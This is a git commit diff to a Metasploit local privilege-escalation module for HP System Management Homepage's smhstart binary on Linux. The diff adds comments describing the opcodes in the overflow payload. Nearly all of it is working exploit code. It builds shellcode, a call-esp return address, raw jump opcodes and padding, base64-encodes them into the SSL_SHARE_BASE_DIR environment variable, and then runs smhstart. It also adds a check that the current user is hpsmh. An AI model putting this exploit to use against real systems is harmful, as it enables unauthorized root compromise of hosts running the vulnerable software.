add opcode description

2013-04-03 13:46:56 +02:00 · 2013-04-03 13:46:56 +02:00 · 60dfece55c
parent 7359151c14
commit 60dfece55c
1 changed files with 11 additions and 11 deletions
--- a/modules/exploits/linux/local/hp_smhstart.rb
+++ b/modules/exploits/linux/local/hp_smhstart.rb
@ -8,18 +8,9 @@
 require 'msf/core'
 require 'rex'
 require 'msf/core/post/common'
-require 'msf/core/post/file'
-require 'msf/core/post/linux/priv'
-require 'msf/core/exploit/local/linux_kernel'
 require 'msf/core/exploit/local/linux'
-require 'msf/core/exploit/local/unix'
 require 'msf/core/exploit/exe'

-#load 'lib/msf/core/post/file.rb'
-#load 'lib/msf/core/exploit/local/unix.rb'
-#load 'lib/msf/core/exploit/local/linux.rb'
-#load 'lib/msf/core/exploit/local/linux_kernel.rb'
-
 class Metasploit4 < Msf::Exploit::Local

 	include Msf::Exploit::EXE
@ -85,8 +76,17 @@ class Metasploit4 < Msf::Exploit::Local
 		pl = payload.encoded
 		padding = rand_text_alpha(target['Offset'])
 		ret = [target['CallEsp']].pack('V')
-		exploit = Rex::Text.encode_base64("#{pl}#{ret}\x81\xc4\x11\xff\xff\xff\xe9\x0e\xff\xff\xff#{padding}")
-		cmd_exec("export SSL_SHARE_BASE_DIR=$(echo -n '#{exploit}' | base64 -d)")
+		exploit =  pl
+		exploit << ret
+		exploit << "\x81\xc4\x11\xff\xff\xff" 	# add esp, 0xffffff11
+		exploit << "\xe9\x0e\xff\xff\xff"		# jmp => begining of pl
+		exploit << padding
+		exploit_encoded = Rex::Text.encode_base64(exploit) # to not break the shell base64 is better
+		id=cmd_exec("id -un")
+		if id!="hpsmh"
+			fail_with(Exploit::Failure::NoAccess, "You are #{id}, you must to be hpsmh to exploit this")
+		end
+		cmd_exec("export SSL_SHARE_BASE_DIR=$(echo -n '#{exploit_encoded}' | base64 -d)")
 		cmd_exec("#{datastore['smhstartDir']}/smhstart")
 	end